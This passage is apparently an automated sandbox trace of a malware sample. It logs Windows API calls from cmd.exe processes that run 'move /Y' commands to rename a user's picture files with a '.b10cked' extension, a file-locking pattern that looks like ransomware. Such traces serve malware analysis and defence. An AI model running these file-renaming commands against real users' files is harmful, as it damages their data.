FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2cf9b4 | out: lpFindFileData=0x2cf9b4) returned 0x3fffe0 [0143.789] FindClose (in: hFindFile=0x3fffe0 | out: hFindFile=0x3fffe0) returned 1 [0143.789] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0143.789] SetCurrentDirectoryW 
(lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0143.789] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0143.789] GetEnvironmentStringsW () returned 0x402ac0* [0143.789] FreeEnvironmentStringsW (penv=0x402ac0) returned 1 [0143.789] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0143.790] GetConsoleOutputCP () returned 0x1b5 [0143.790] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0143.790] GetUserDefaultLCID () returned 0x409 [0143.790] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0143.791] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2cfd78, cchData=128 | out: lpLCData="0") returned 2 [0143.791] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2cfd78, cchData=128 | out: lpLCData="0") returned 2 [0143.791] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2cfd78, cchData=128 | out: lpLCData="1") returned 2 [0143.791] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0143.791] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0143.791] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0143.791] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0143.791] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0143.791] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0143.791] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 
4 [0143.791] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0143.791] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0143.791] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0143.791] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0143.792] GetConsoleTitleW (in: lpConsoleTitle=0x3f08c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0143.792] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0143.792] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0143.793] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0143.793] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0143.793] _wcsicmp (_String1="move", _String2=")") returned 68 [0143.793] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0143.794] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0143.794] _wcsicmp (_String1="IF", _String2="move") returned -4 [0143.794] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0143.794] _wcsicmp (_String1="REM", _String2="move") returned 5 [0143.794] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0143.796] GetConsoleTitleW (in: lpConsoleTitle=0x2cfa70, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0143.797] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0143.797] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0143.797] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0143.797] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0143.797] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0143.797] _wcsicmp (_String1="move", _String2="CD") returned 10 [0143.797] _wcsicmp 
(_String1="move", _String2="CHDIR") returned 10 [0143.797] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0143.797] _wcsicmp (_String1="move", _String2="REN") returned -5 [0143.797] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0143.797] _wcsicmp (_String1="move", _String2="SET") returned -6 [0143.797] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0143.797] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0143.797] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0143.797] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0143.797] _wcsicmp (_String1="move", _String2="MD") returned 11 [0143.797] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0143.797] _wcsicmp (_String1="move", _String2="RD") returned -5 [0143.797] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0143.797] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0143.797] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0143.797] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0143.797] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0143.797] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0143.797] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0143.797] _wcsicmp (_String1="move", _String2="VER") returned -9 [0143.797] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0143.797] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0143.797] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0143.797] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0143.797] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0143.797] _wcsicmp (_String1="move", _String2="START") returned -6 [0143.797] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0143.797] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0143.797] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0143.799] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0143.799] 
GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0143.799] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2cf82c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2cf824, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2cf824*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0143.799] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0143.799] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0143.799] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0143.799] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0143.799] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0143.799] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0143.799] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0143.799] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0143.799] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0143.799] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0143.799] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0143.799] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0143.799] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0143.799] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0143.799] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0143.799] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0143.799] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0143.800] 
_wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0143.800] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0143.800] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0143.800] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0143.800] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0143.800] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0143.800] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0143.800] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0143.800] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0143.800] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0143.800] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0143.800] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0143.800] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0143.800] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0143.800] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0143.800] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0143.800] _wcsicmp (_String1="If0lC.jpg", _String2=".") returned 59 [0143.800] _wcsicmp (_String1="If0lC.jpg", _String2="..") returned 59 [0143.801] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\If0lC.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\if0lc.jpg")) returned 0x20 [0143.801] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x401d28 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0143.801] SetErrorMode (uMode=0x0) returned 0x0 [0143.801] SetErrorMode (uMode=0x1) returned 0x0 [0143.801] GetFullPathNameW (in: 
lpFileName="C:\\Users\\EEBsYm5\\Pictures\\If0lC.jpg", nBufferLength=0x104, lpBuffer=0x2cf1b4, lpFilePart=0x2cf19c | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\If0lC.jpg", lpFilePart=0x2cf19c*="If0lC.jpg") returned 0x23 [0143.801] SetErrorMode (uMode=0x0) returned 0x1 [0143.801] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures" (normalized: "c:\\users\\eebsym5\\pictures")) returned 0x13 [0143.801] _wcsicmp (_String1="If0lC.jpg", _String2=".") returned 59 [0143.801] _wcsicmp (_String1="If0lC.jpg", _String2="..") returned 59 [0143.801] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\If0lC.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\if0lc.jpg")) returned 0x20 [0143.801] SetErrorMode (uMode=0x0) returned 0x0 [0143.801] SetErrorMode (uMode=0x1) returned 0x0 [0143.801] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\If0lC.jpg", nBufferLength=0x104, lpBuffer=0x2cf630, lpFilePart=0x2cf3c8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\If0lC.jpg", lpFilePart=0x2cf3c8*="If0lC.jpg") returned 0x23 [0143.802] SetErrorMode (uMode=0x0) returned 0x1 [0143.802] SetErrorMode (uMode=0x0) returned 0x0 [0143.802] SetErrorMode (uMode=0x1) returned 0x0 [0143.802] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\If0lC.jpg.b10cked", nBufferLength=0x104, lpBuffer=0x2cf838, lpFilePart=0x2cf3c8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\If0lC.jpg.b10cked", lpFilePart=0x2cf3c8*="If0lC.jpg.b10cked") returned 0x2b [0143.802] SetErrorMode (uMode=0x0) returned 0x1 [0143.802] SetLastError (dwErrCode=0x0) [0143.802] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\If0lC.jpg.b10cked" (normalized: "c:\\users\\eebsym5\\pictures\\if0lc.jpg.b10cked")) returned 0xffffffff [0143.802] GetLastError () returned 0x2 [0143.802] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\If0lC.jpg", fInfoLevelId=0x1, lpFindFileData=0x2ced44, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ced44) 
returned 0x402198 [0143.802] FindNextFileW (in: hFindFile=0x402198, lpFindFileData=0x2ced44 | out: lpFindFileData=0x2ced44) returned 0 [0143.804] GetLastError () returned 0x12 [0143.804] FindClose (in: hFindFile=0x402198 | out: hFindFile=0x402198) returned 1 [0143.805] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\If0lC.jpg", fInfoLevelId=0x1, lpFindFileData=0x401ac8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x401ac8) returned 0x402198 [0143.805] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\If0lC.jpg.b10cked", nBufferLength=0x104, lpBuffer=0x2cefdc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\If0lC.jpg.b10cked", lpFilePart=0x0) returned 0x2b [0143.805] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\If0lC.jpg", nBufferLength=0x104, lpBuffer=0x2cefdc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\If0lC.jpg", lpFilePart=0x0) returned 0x23 [0143.805] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\If0lC.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\if0lc.jpg")) returned 0x20 [0143.805] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Pictures\\If0lC.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\if0lc.jpg"), lpNewFileName="C:\\Users\\EEBsYm5\\Pictures\\If0lC.jpg.b10cked" (normalized: "c:\\users\\eebsym5\\pictures\\if0lc.jpg.b10cked"), dwFlags=0x3) returned 1 [0143.806] FindClose (in: hFindFile=0x402198 | out: hFindFile=0x402198) returned 1 [0143.806] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x2cef90 | out: _Buffer=" 1") returned 9 [0143.806] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.806] GetFileType (hFile=0x7) returned 0x2 [0143.934] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0143.934] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cef1c | out: lpMode=0x2cef1c) returned 1 [0143.934] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.934] GetConsoleScreenBufferInfo 
(in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2cef50 | out: lpConsoleScreenBufferInfo=0x2cef50) returned 1 [0143.935] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0143.935] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x2cef90 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0143.935] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x2cef74, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2cef74*=0x1a) returned 1 [0143.935] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.935] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0143.935] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.935] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0143.936] _get_osfhandle (_FileHandle=0) returned 0x3 [0143.936] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0143.936] SetConsoleInputExeNameW () returned 0x1 [0143.936] GetConsoleOutputCP () returned 0x1b5 [0143.936] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0143.936] SetThreadUILanguage (LangId=0x0) returned 0x409 [0143.936] exit (_Code=0) Process: id = "186" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16f40" os_pid = "0x6f0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\isdKb.jpg\" \"C:\\Users\\EEBsYm5\\Pictures\\isdKb.jpg.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = 
"CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 16631 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 16632 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 16633 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 16634 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 16635 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 16636 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 16637 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 16638 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 16639 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 16640 start_va = 
0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 16691 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 16692 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 16693 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 16694 start_va = 0x1c0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 16695 start_va = 0x4a0000 end_va = 0x59ffff entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 16696 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 16697 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 16698 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 16699 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 16700 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" 
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 16701 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 16702 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 16703 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 16704 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 16705 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 16706 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 16707 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 16708 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 16709 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 16710 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: 
id = 16711 start_va = 0x1d0000 end_va = 0x1d0fff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 16712 start_va = 0x2f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 16713 start_va = 0x5a0000 end_va = 0x119ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 16714 start_va = 0x11a0000 end_va = 0x1302fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011a0000" filename = "" Thread: id = 243 os_tid = 0x8b8 [0143.544] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2efd14 | out: lpSystemTimeAsFileTime=0x2efd14*(dwLowDateTime=0x8f7d01a0, dwHighDateTime=0x1d440a9)) [0143.544] GetCurrentProcessId () returned 0x6f0 [0143.544] GetCurrentThreadId () returned 0x8b8 [0143.544] GetTickCount () returned 0x2cd9a [0143.544] QueryPerformanceCounter (in: lpPerformanceCount=0x2efd0c | out: lpPerformanceCount=0x2efd0c*=20033364736) returned 1 [0143.545] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0143.545] __set_app_type (_Type=0x1) [0143.545] __p__fmode () returned 0x76b331f4 [0143.545] __p__commode () returned 0x76b331fc [0143.546] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0143.546] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0143.546] GetCurrentThreadId () returned 0x8b8 [0143.546] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x8b8) returned 0x38 [0143.546] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0143.546] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0143.546] SetThreadUILanguage (LangId=0x0) returned 0x409 [0143.546] HeapSetInformation (HeapHandle=0x0, 
HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0143.546] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2efca4 | out: phkResult=0x2efca4*=0x0) returned 0x2 [0143.546] VirtualQuery (in: lpAddress=0x2efcdb, lpBuffer=0x2efc74, dwLength=0x1c | out: lpBuffer=0x2efc74*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.546] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x2efc74, dwLength=0x1c | out: lpBuffer=0x2efc74*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0143.546] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2efc74, dwLength=0x1c | out: lpBuffer=0x2efc74*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0143.547] VirtualQuery (in: lpAddress=0x1f3000, lpBuffer=0x2efc74, dwLength=0x1c | out: lpBuffer=0x2efc74*(BaseAddress=0x1f3000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.547] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2efc74, dwLength=0x1c | out: lpBuffer=0x2efc74*(BaseAddress=0x2f0000, AllocationBase=0x2f0000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0143.547] GetConsoleOutputCP () returned 0x1b5 [0143.547] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0143.547] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0143.547] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.547] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0143.547] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.547] GetConsoleMode (in: 
